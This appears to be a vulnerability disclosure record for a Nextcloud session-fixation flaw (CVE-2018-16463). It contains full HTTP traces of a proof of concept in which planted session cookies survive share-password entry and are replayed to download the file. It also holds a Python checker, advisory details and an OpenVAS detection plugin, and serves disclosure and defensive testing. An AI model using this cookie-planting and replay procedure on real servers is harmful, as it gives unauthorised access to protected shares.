Nextcloud: Session fixation in password protected public download.
2017-06-06T09:17:29
ID: H1:237184 | Type: hackerone | Reporter: frankspierings | Published: 2017-06-06T09:17:29 | Modified: 2018-10-25T10:26:31 | Bounty: 50.0 (resolved)
Description
Public downloads protected with a password are vulnerable to a session fixation attack: the session cookie that the client presents before authenticating to a password-protected share is kept, unchanged, after the password has been accepted. An attacker who can plant a session cookie of their choosing in the victim's browser therefore ends up holding an authenticated session for the share once the victim enters the password. This finding was discovered during a penetration test of Nextcloud version 10.0.2.7.

1) Pre-provision the victim with attacker-controlled cookie values. The interesting ones are the session cookie (ocu1w9tvnra8 in this instance) and oc_sessionPassphrase; the two __Host-nc_sameSite* cookies are only Nextcloud's SameSite markers.

Firefox cookie manager (Netscape cookie format):
```
www.clouddrive.example	FALSE	%2F	FALSE	0	ocu1w9tvnra8	AAAAAAAAAAAAAAAAAAAAAAAAA1
www.clouddrive.example	FALSE	%2F	TRUE	0	oc_sessionPassphrase	AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
www.clouddrive.example	FALSE	%2F	TRUE	4133980799	__Host-nc_sameSiteCookielax	TRUE
www.clouddrive.example	FALSE	%2F	TRUE	4133980799	__Host-nc_sameSiteCookiestrict	TRUE
```

2) The victim receives a public download link for a file. This resource is password protected by Nextcloud. Downloading the file consists of several requests. Notice that every request is performed with the pre-provisioned cookies, and that these cookies are never replaced after successful authentication.

Request:
```
GET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __Host-nc_sameSiteCookielax=TRUE; __Host-nc_sameSiteCookiestrict=TRUE; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1
```

Response:
```
HTTP/1.1 302 Found
Date: Tue, 06 Jun 2017 08:26:52 GMT
Server: Apache
X-Powered-By: PHP/7.0.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'nonce-a3N2dzQremRnTmJLdytUaWJoZkEvenVZUHYwRjhDZVFUT2dacUNyb0s0ND06MnIrS3pMU3Y2T0MvcXFpb0ZGNlB5bFgvRDdSZnNtN25QN3hmNzFpcVc4TT0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *
Set-Cookie: __Host-nc_sameSiteCookielax=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=lax
Set-Cookie: __Host-nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fri, 31-Dec-2100 23:59:59 GMT; SameSite=strict
Location: /index.php/s/Ezn3dOeZ28Hph57
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Frame-Options: SAMEORIGIN
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Connection: close
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;
Content-Length: 0
```

Request:
```
GET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1
```

Response:
```
HTTP/1.1 303 See Other
Date: Tue, 06 Jun 2017 08:26:54 GMT
Server: Apache
X-Powered-By: PHP/7.0.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Security-Policy: default-src 'none';script-src 'nonce-S1pwTXU1dEdaSEVkSFZPeENMR01jbVBxcGZLSmJTaC9CS0lpNHZtOGNnWT06WWU0MmxNTTBERWRvZEIvN2N2akRSdzJObEx2VEwyRUlkL1prcFl2K0Frcz0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
Location: /index.php/s/Ezn3dOeZ28Hph57/authenticate
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Frame-Options: SAMEORIGIN
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Connection: close
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;
Content-Length: 0
```

Request:
```
GET /index.php/s/Ezn3dOeZ28Hph57/authenticate HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1
```

Response:
```
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2017 08:26:56 GMT
Server: Apache
X-Powered-By: PHP/7.0.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Security-Policy: default-src 'none';script-src 'nonce-NnBNTW9hUjVmeWJUNzJkdm1YaDFJQUhzV2hnL2VqVEgrdHlDSmJ5Rzc0dz06b3VkMmp2d0xGeENtaGlzbDR6RTZGVytMYTFGbE9IMndpWWpFWXM3RW44RT0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Length: 17294
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Frame-Options: SAMEORIGIN
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Connection: close
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;
```

Now the authentication takes place. The share password is submitted together with the CSRF requesttoken taken from the form:

Request:
```
POST /index.php/s/Ezn3dOeZ28Hph57/authenticate HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Cookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1

requesttoken=6pMMoaR5fybT72dvmXh1IAHsWhg%2FejTH%2BtyCJbyG74w%3D%3Aoud2jvwLFxCmhisl4zE6FW%2BLa1FlOH2wiYjEYs7En8E%3D&password=SessionFixation01%21
```

Response (note: no Set-Cookie header, so the attacker-supplied session id survives the successful login):
```
HTTP/1.1 303 See Other
Date: Tue, 06 Jun 2017 08:27:10 GMT
Server: Apache
X-Powered-By: PHP/7.0.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Security-Policy: default-src 'none';script-src 'nonce-M3hVNVRMdTJkYWZGNTFoQVN4VHcrRTZ6b2dHUkg0SnQrM0w4Z01VNU1MST06bDJGRFkrUEVIWkd3amhRS01WMi96U0RVazBqTFhjc2FpQ2E2eDdkN1FQOD0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
Location: /index.php/s/Ezn3dOeZ28Hph57
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Frame-Options: SAMEORIGIN
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Connection: close
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;
Content-Length: 0
```

Request:
```
GET /index.php/s/Ezn3dOeZ28Hph57 HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1
```

Response headers:
```
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2017 08:27:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Security-Policy: default-src 'none';script-src 'nonce-aGcyeFVwaml6OGprZWpNbWdBUFVvMkMyM0p0WVpWUXdTNkpPKzlkZHZPND06em5uTGZjQ1FwLzZSRTM5cytrcWJsZzdSN2RJQ0p4MUhPUFlJdktVZnpLTT0=' 'unsafe-eval';style-src 'self' 'unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self';frame-src 'self'
Content-Length: 20599
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Frame-Options: SAMEORIGIN
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Connection: close
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;
```

Clicking the direct download button generates the following:

Request:
```
GET /index.php/s/Ezn3dOeZ28Hph57/download HTTP/1.1
Host: www.clouddrive.example
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: __Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true; ocu1w9tvnra8=AAAAAAAAAAAAAAAAAAAAAAAAA1; oc_sessionPassphrase=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1
Connection: close
Upgrade-Insecure-Requests: 1
```

Response:
```
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2017 08:29:11 GMT
Server: Apache
X-Powered-By: PHP/7.0.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'nonce-emRneTV0RDFQQXRibTlqY0phbUJsTm5QcTJSSGZ1RFVQWFgxZTROUFpyUT06aGF4SXlZaUhWRDB1OHBTV1grRE9vYmVvbWkwZFBLbWpUaUd6UFBFTkZ2az0='; style-src 'self' 'unsafe-inline'; frame-src *; img-src * data: blob:; font-src 'self' data:; media-src *; connect-src *
Content-Disposition: attachment; filename*=UTF-8''Public%20Download%20-%20Session%20Fixation%20Example.txt; filename="Public%20Download%20-%20Session%20Fixation%20Example.txt"
OC-ETag: "5936650b3d865"
Last-Modified: Tue, 06 Jun 2017 08:17:15 GMT
ETag: "5936650b3d865"
Content-Length: 54
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Frame-Options: SAMEORIGIN
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Content-Type: text/plain;charset=UTF-8
Strict-Transport-Security: max-age=16000000; includeSubDomains; preload;

This file could be acquired through session fixation.
```

Across the whole exchange the only Set-Cookie headers are the two __Host-nc_sameSite* markers in the very first response, which merely normalise the planted value TRUE to true. Neither ocu1w9tvnra8 nor oc_sessionPassphrase is ever re-issued, not even in the 303 that follows the accepted password, so the attacker-chosen session id is now bound to a session that has unlocked the share. Replaying the same two cookie values against /index.php/s/Ezn3dOeZ28Hph57/download from any other client yields the file without ever sending the password.

3) The attacker needs the following to acquire the file:
- Pre-provision the cookies in the victim's browser.
- Know the token to the public file.
- Wait for the victim to enter the share password, then replay the planted cookies.

Planting cookies for the Nextcloud host in the victim's browser is the hard precondition, which is why the issue is rated low (CVSS v2 3.6, AV:N/AC:H/Au:S/C:P/I:P/A:N). The standard defence is to regenerate the session id whenever a session gains privileges, here when the share password is accepted.
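The check below is an added example, not code from the HackerOne report or from Nextcloud. It drives the share-password flow with an attacker-chosen session cookie and reports whether the victim authenticated, whether the session cookie was ever re-issued, and whether the attacker's untouched copy of the cookie can now fetch /download. The HTTP transport is injected, so the same function runs offline against an in-memory model of the reported behaviour and of the fixed behaviour (that model is this example's own, not Nextcloud's patch). The cookie name ocu1w9tvnra8, the share token and the password are taken from the report; the data-requesttoken attribute used to pick up the CSRF token, and the assumption that the server accepts an arbitrary client-supplied session id, are assumptions of the example.

```python
"""Added example: replays a password-protected share flow with a planted
session cookie and tells whether the attacker can reuse it afterwards.
Not code from the HackerOne report or from Nextcloud."""
import re
import secrets
from dataclasses import dataclass, field

SESSION_COOKIE = "ocu1w9tvnra8"   # session cookie name as seen in the report


@dataclass
class Response:
    status: int
    headers: list = field(default_factory=list)   # (name, value) pairs, repeats allowed
    body: str = ""

    def header(self, name):
        return next((v for k, v in self.headers if k.lower() == name.lower()), "")

    def reissued_cookies(self):
        """Cookie names this response sets via Set-Cookie."""
        return {v.split(";", 1)[0].split("=", 1)[0].strip()
                for k, v in self.headers if k.lower() == "set-cookie"}


def apply_set_cookie(jar, resp):
    """Update a cookie jar the way a browser would (name=value only)."""
    for k, v in resp.headers:
        if k.lower() == "set-cookie":
            name, _, value = v.split(";", 1)[0].partition("=")
            jar[name.strip()] = value.strip()


def fixation_check(http, token, password, planted_value):
    """http(method, path, cookies, data) -> Response is the injected transport."""
    share = f"/index.php/s/{token}"
    victim = {SESSION_COOKIE: planted_value}   # cookie the attacker planted
    attacker = dict(victim)                     # attacker keeps the same value

    # 1) the victim loads the password form with the planted cookie
    form = http("GET", f"{share}/authenticate", victim, None)
    apply_set_cookie(victim, form)
    # Assumption: the CSRF token is exposed as a data-requesttoken attribute
    m = re.search(r'data-requesttoken="([^"]+)"', form.body)
    data = {"password": password, **({"requesttoken": m.group(1)} if m else {})}

    # 2) the victim submits the share password (303 away from /authenticate = accepted)
    auth = http("POST", f"{share}/authenticate", victim, data)
    apply_set_cookie(victim, auth)
    authenticated = auth.status in (302, 303) and not auth.header("Location").endswith("/authenticate")

    # 3) the attacker replays only the planted cookie, never having sent the password
    download = http("GET", f"{share}/download", attacker, None)
    return {
        "victim_authenticated": authenticated,
        "session_cookie_reissued": SESSION_COOKIE in (form.reissued_cookies() | auth.reissued_cookies()),
        "attacker_can_download": download.status == 200,
    }


class ShareServer:
    """In-memory model of the share flow (assumption, not Nextcloud code).
    rotate=False keeps the session id across authentication, as reported;
    rotate=True issues a fresh id once the password is accepted."""

    def __init__(self, token, password, rotate):
        self.token, self.password, self.rotate = token, password, rotate
        self.sessions = {}   # session id -> set of share tokens unlocked in it

    def __call__(self, method, path, cookies, data):
        m = re.fullmatch(r"/index\.php/s/([^/]+)(/authenticate|/download)?", path)
        if not m or m.group(1) != self.token:
            return Response(404)
        # Assumption: any client-supplied session id is accepted as-is
        sid = cookies.get(SESSION_COOKIE) or secrets.token_hex(8)
        state = self.sessions.setdefault(sid, set())
        if m.group(2) == "/authenticate" and method == "POST":
            if (data or {}).get("password") != self.password:
                return Response(303, [("Location", path)])
            headers = []
            if self.rotate:
                new_sid = secrets.token_hex(8)
                self.sessions[new_sid] = self.sessions.pop(sid)   # old id is now dead
                headers.append(("Set-Cookie", f"{SESSION_COOKIE}={new_sid}; Path=/; Secure; HttpOnly"))
            state.add(self.token)
            return Response(303, headers + [("Location", f"/index.php/s/{self.token}")])
        if m.group(2) == "/authenticate":
            return Response(200, [], '<head data-requesttoken="tok:abc">')
        if self.token in state:   # unlocked: share page or the file itself
            return Response(200, [("Content-Disposition", "attachment")] if m.group(2) else [], "secret")
        return Response(303, [("Location", f"/index.php/s/{self.token}/authenticate")])


def demo(token="Ezn3dOeZ28Hph57", password="SessionFixation01!"):
    planted = "A" * 25 + "1"   # constructed planted value, shaped like the report's
    return {label: fixation_check(ShareServer(token, password, rotate), token, password, planted)
            for label, rotate in (("vulnerable", False), ("fixed", True))}


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

Against a live instance, inject a wrapper that calls requests.request(method, base_url + path, cookies=cookies, data=data, allow_redirects=False) and converts the status code, the raw header pairs (so repeated Set-Cookie lines survive) and the body into a Response; allow_redirects=False matters because the verdict depends on seeing the 303 after the POST rather than following it. The vulnerable model reproduces the report exactly: the victim authenticates, no session cookie is re-issued, and the attacker's copy downloads the file. In the fixed model the victim's browser receives a new id on the 303 and the attacker's stale value is refused.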
Related records

CVE-2018-16463 (NVD, published 2018-10-30, CWE-384 Session Fixation): "A bug causing session fixation in Nextcloud Server prior to 14.0.0, 13.0.3 and 12.0.8 could potentially allow an attacker to obtain access to password protected shares."
- CVSS v3.0: 3.1 (Low), CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:N
- CVSS v2: 3.6 (Low), AV:N/AC:H/Au:S/C:P/I:P/A:N
- CPE entries listed by NVD: cpe:2.3:a:nextcloud:nextcloud_server:14.0.0 beta1 through beta4 and rc1 through rc2
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-16463

Vendor advisory NC-SA-2018-013, "Session fixation on public share page" (published 2018-10-25): "A bug causing session fixation could potentially allow an attacker to obtain access to password protected shares."
- Affected: Nextcloud Server before 14.0.0, 13.0.x before 13.0.3 and 12.0.x before 12.0.8.
- Solution: upgrade to 12.0.8, 13.0.3 or 14.0.0 respectively.
- https://nextcloud.com/security/advisory/?id=NC-SA-2018-013

HackerOne report: https://hackerone.com/reports/237184 (reported 2017-06-06 against version 10.0.2.7; the advisory and CVE followed in October 2018).

OpenVAS detection (Greenbone Networks, author Adrian Steins, created 2018-11-01): two version-check plugins, OPENVAS:1361412562310112417 (Windows, qod_type remote_banner) and OPENVAS:1361412562310112416 (Linux, qod_type remote_banner_unreliable). Both flag only versions below 12.0.8 and versions in the range 13.0.0 to 13.0.2; a 14.0.0 pre-release, which is what the NVD CPE entries list, would not be reported, so do not rely on this check alone for beta or rc deployments. The Windows plugin:

```nasl
###############################################################################
# OpenVAS Vulnerability Test
#
# Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Windows)
#
# Authors:
# Adrian Steins <adrian.steins@greenbone.net>
#
# Copyright:
# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.112417");
  script_version("2020-02-07T08:53:35+0000");
  script_tag(name:"last_modification", value:"2020-02-07 08:53:35 +0000 (Fri, 07 Feb 2020)");
  script_tag(name:"creation_date", value:"2018-11-01 11:49:50 +0100 (Thu, 01 Nov 2018)");
  script_tag(name:"cvss_base", value:"3.6");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:H/Au:S/C:P/I:P/A:N");

  script_tag(name:"qod_type", value:"remote_banner");

  script_tag(name:"solution_type", value:"VendorFix");

  script_cve_id("CVE-2018-16463");

  script_name("Nextcloud Server < 14.0.0, < 13.0.3, < 12.0.8 Session fixation on public share page (NC-SA-2018-013) (Windows)");

  script_category(ACT_GATHER_INFO);

  script_copyright("Copyright (C) 2018 Greenbone Networks GmbH");
  script_family("Web application abuses");
  script_dependencies("gb_nextcloud_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("nextcloud/installed", "Host/runs_windows");

  script_tag(name:"summary", value:"This host is running Nextcloud Server
  and is prone to a session fixation vulnerability.");

  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present
  on the target host.");

  script_tag(name:"insight", value:"A bug causing session fixation could potentially
  allow an attacker to obtain access to password protected shares.");

  script_tag(name:"affected", value:"Nextcloud Server before version 14.0.0, 13.0.x
  before 13.0.3 and 12.0.x before 12.0.8.");

  script_tag(name:"solution", value:"Upgrade Nextcloud Server to version 12.0.8, 13.0.3,
  or 14.0.0 respectively.");

  script_xref(name:"URL", value:"https://hackerone.com/reports/237184");
  script_xref(name:"URL", value:"https://nextcloud.com/security/advisory/?id=NC-SA-2018-013");

  exit(0);
}

CPE = "cpe:/a:nextcloud:nextcloud";

include("version_func.inc");
include("host_details.inc");

if(!port = get_app_port(cpe:CPE))
  exit(0);

if(!infos = get_app_version_and_location(cpe:CPE, port:port, exit_no_version:TRUE))
  exit(0);

vers = infos["version"];
path = infos["location"];

# Versions below 12.0.8 are reported against 12.0.8 ...
if(version_is_less(version:vers, test_version:"12.0.8")) {
  report = report_fixed_ver(installed_version:vers, fixed_version:"12.0.8", install_path:path);
  security_message(port:port, data:report);
  exit(0);
}

# ... and 13.0.0 to 13.0.2 against 13.0.3; anything else (14.0.0 pre-releases included) exits silently.
if(version_in_range(version:vers, test_version:"13.0.0", test_version2:"13.0.2")) {
  report = report_fixed_ver(installed_version:vers, fixed_version:"13.0.3", install_path:path);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);
```

The Linux plugin (OID 1.3.6.1.4.1.25623.1.0.112416, same version, creation date and authorship) is identical apart from three lines: script_name() ends in "(Linux)", script_mandatory_keys("nextcloud/installed", "Host/runs_unixoide") replaces the Windows key, and script_tag(name:"qod_type", value:"remote_banner_unreliable") replaces remote_banner.